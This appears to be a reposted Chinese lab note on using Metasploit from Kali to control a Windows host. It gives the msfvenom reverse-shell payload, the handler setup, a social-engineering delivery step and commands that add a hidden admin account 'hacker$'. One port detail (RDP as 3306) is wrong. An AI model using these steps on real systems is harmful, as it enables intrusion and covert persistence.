使用kail中Metasploit获取Windows的权限-9.20

  kail基于Debian的数字取证系统,上面集成很多渗透工具,其前身是BT5 (R3)(BrackTrack)。
其中Metasploit是一个综合利用工具,极大提高攻击者的渗透效率,使用Ruby开发的,使用方便,使用该工具的方式:msfconsole,MSF依赖于Postgresql数据库,在使用MSF之前要开启该数据库。
step1:生成木马,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128  lport=555 -f exe >/root/桌面/evilshell.exe
-p -参数后跟上payload,攻击成功后要做什么事情;
lhost 后跟监听的IP
lport 后跟监听的端口
-f 后跟要监听的后门类型
 
step2:将木马文件evishell.exe文件放到/var/www/html文件夹下,开启Apache,在Windows里输入kail的ip,下载到桌面
step3:开启MSF,msfconsole(提前查看postgresql运行状态)
=[ metasploit v5.0.46-dev                          ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion       
Exploits :开发利用,攻击某些服务、平台、系统等用到的工具
Payload:载荷载体,攻击成功后要操作什么
Msf>use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >show options
msf5 exploit(multi/handler) > set lhost 192.168.16.128
msf5 exploit(multi/handler) > set lport 555
msf5 exploit(multi/handler) > exploit
step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kail中就会得到肉鸡的shell(meterpreter)
meterpreter>shell
ipconfig
net user hacker$ 123.c /add
net localgroup administrators hacker$ /add
step5:在kail中开一个新终端,rdesktop 192.168.16.131
 
实验反思:使用win7系统实验失败,建议换成win service 2008 r2:
win7默认远程桌面(3306)端口是不开的,win7默认的cmd不是管理员权限,没有创建用户的权限,我在win7系统中用管理员打开cmd创建hacker(net user hacker$ 123.c /add),加入到管理员用户组(net localgroup Administrator hacker$ /add),然后在kail里远程连接(rdesktop 192.168.16.131),显示会挤掉win7正在登陆的用户,而win7那边也有提示。。。。。。。

转载于:https://www.cnblogs.com/yyhfirstblog/p/11567789.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值